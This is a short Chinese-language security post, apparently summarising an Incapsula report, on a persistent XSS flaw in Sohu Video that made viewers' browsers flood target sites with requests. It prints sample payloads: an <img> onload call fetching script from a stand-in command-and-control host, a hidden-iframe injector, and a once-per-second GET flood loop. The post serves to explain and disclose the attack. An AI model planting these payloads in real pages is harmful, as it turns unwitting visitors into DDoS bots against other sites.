XSS攻擊：SOHU視頻XSS漏洞導致其使用者成為DDOS肉雞

XSS又叫CSS (Cross Site Script) ,跨站指令碼攻擊。惡意攻擊者往Web頁面裡插入惡意html代碼，當使用者瀏覽該頁之時，嵌入其中Web裡面的html代碼會被執行，從而達到惡意攻擊使用者的特殊目的。

from:http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html 

incapsula發現其一個客戶遭受了應用程式層的DDos攻擊。 

大概有22000的互連網使用者對其網站發起了2000萬的GET請求。 
該攻擊是利用的一個持久性XSS，通過找到一個訪問量很大網站的xss，在其網站上插入一段js代碼，當其使用者訪問網站之後，就可以利用該網站的使用者對其受害者發起攻擊。 

幾種範例程式碼： 
// JavaScript Injection in <img> tag enabled by Persistent XSS 
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" /> 

// Malicious JavaScript opens hidden <iframe> 
function ddos(url) { 
$("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); } 

// Ajax DDoS tool in executes GET request every second 
<html><body> 
<h1>Iframe</h1> 
<script> 
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg'); 
function ddos(url,url2){ 
  window.setInterval(function (){ 
    $.getScript(url); 
    $.getScript(url2); 
      },1000) 
} 
</script> 
</body></html>
這種攻擊方式在找到訪問量巨大的視頻網站的xss之後，非常好用，因為一般的視頻時間不短，這樣訪問者在訪問視頻網站觀看視頻的時間段內，就不知不覺的成為攻擊者的工具對其受害者網站不斷的發送請求。 
此次被利用的是sohu視頻，全球網站流量排名27，可在視頻地區插入xss代碼，控制觀看該視頻的使用者對受害者不斷的發送請求。 

註：攻擊的效果就是每秒都請求一次url和url2指定的串連，如果一段視頻30分鐘，那麼每個使用者都能在看視頻這段時間內向兩個目標分別發出 1800 次無意義的攻擊請求（如cc），如果是成千上萬的人看個發燒影片的話。。。